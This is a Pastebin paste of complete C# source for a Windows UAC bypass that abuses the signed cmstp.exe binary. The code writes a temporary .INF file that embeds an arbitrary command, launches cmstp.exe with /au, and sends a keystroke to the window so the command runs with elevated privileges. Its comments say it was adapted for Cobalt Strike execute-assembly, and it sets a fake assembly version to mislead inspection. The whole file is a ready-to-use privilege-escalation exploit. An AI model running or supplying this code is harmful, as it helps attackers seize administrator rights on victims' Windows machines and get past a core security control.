Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- UAC Bypass using CMSTP.exe microsoft binary
- Based on previous work from Oddvar Moe
- https://oddvar.moe/2017/08/15/research-on-cmstp-exe/
- And this PowerShell script of Tyler Applebaum
- https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1
- Code author: Andre Marques (@_zc00l)
- Modified by Nicolas Heiniger to include a main and use with Cobalt Strike execute-assembly.
- */
- using System;
- using System.Reflection;
- using System.Text;
- using System.IO;
- using System.Diagnostics;
- using System.ComponentModel;
- using System.Windows;
- using System.Runtime.InteropServices;
- // This is fake but will show in the properties :)
- [assembly:AssemblyVersionAttribute("1.6.9")]
- public class zc00l_bp
- {
- // Our .INF file data!
- public static string InfData = @"[version]
- Signature=$chicago$
- AdvancedINF=2.5
- [DefaultInstall]
- CustomDestination=CustInstDestSectionAllUsers
- RunPreSetupCommands=RunPreSetupCommandsSection
- [RunPreSetupCommandsSection]
- ; Commands Here will be run Before Setup Begins to install
- TO_BE_REPLACED
- taskkill /IM cmstp.exe /F
- [CustInstDestSectionAllUsers]
- 49000,49001=AllUSer_LDIDSection, 7
- [AllUSer_LDIDSection]
- ""HKLM"", ""SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE"", ""ProfileInstallPath"", ""%UnexpectedError%"", """"
- [Strings]
- ServiceName=""CapsSVC""
- ShortSvcName=""CapsSVC""
- ";
- [DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
- [DllImport("user32.dll", SetLastError = true)] public static extern bool SetForegroundWindow(IntPtr hWnd);
- public static string BinaryPath = "c:\\windows\\system32\\cmstp.exe";
- /* Generates a random named .inf file with command to be executed with UAC privileges */
- public static string CreateFile(string CommandToExecute)
- {
- string RandomFileName = Path.GetRandomFileName().Split(Convert.ToChar("."))[0];
- string TemporaryDir = "C:\\windows\\temp";
- StringBuilder OutputFile = new StringBuilder();
- OutputFile.Append(TemporaryDir);
- OutputFile.Append("\\");
- OutputFile.Append(RandomFileName);
- OutputFile.Append(".inf");
- StringBuilder newInfData = new StringBuilder(InfData);
- newInfData.Replace("TO_BE_REPLACED", CommandToExecute);
- File.WriteAllText(OutputFile.ToString(), newInfData.ToString());
- return OutputFile.ToString();
- }
- public static bool JustDoIt(string CommandToExecute)
- {
- if(!File.Exists(BinaryPath))
- {
- Console.WriteLine("Binary not found!");
- return false;
- }
- StringBuilder InfFile = new StringBuilder();
- InfFile.Append(CreateFile(CommandToExecute));
- Console.WriteLine("Inf written to " + InfFile.ToString());
- ProcessStartInfo startInfo = new ProcessStartInfo(BinaryPath);
- startInfo.Arguments = "/au " + InfFile.ToString();
- startInfo.UseShellExecute = false;
- Process.Start(startInfo);
- IntPtr windowHandle = new IntPtr();
- windowHandle = IntPtr.Zero;
- do {
- windowHandle = SetWindowActive("cmstp");
- } while (windowHandle == IntPtr.Zero);
- System.Windows.Forms.SendKeys.SendWait("{ENTER}");
- return true;
- }
- public static IntPtr SetWindowActive(string ProcessName)
- {
- Process[] target = Process.GetProcessesByName(ProcessName);
- if(target.Length == 0) return IntPtr.Zero;
- target[0].Refresh();
- IntPtr WindowHandle = new IntPtr();
- WindowHandle = target[0].MainWindowHandle;
- if(WindowHandle == IntPtr.Zero) return IntPtr.Zero;
- SetForegroundWindow(WindowHandle);
- ShowWindow(WindowHandle, 5);
- return WindowHandle;
- }
- static void Main(string[] args)
- {
- if (args.Length != 0)
- {
- JustDoIt(args[0]);
- }
- else
- {
- Console.WriteLine("Please provide a command to run.");
- }
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement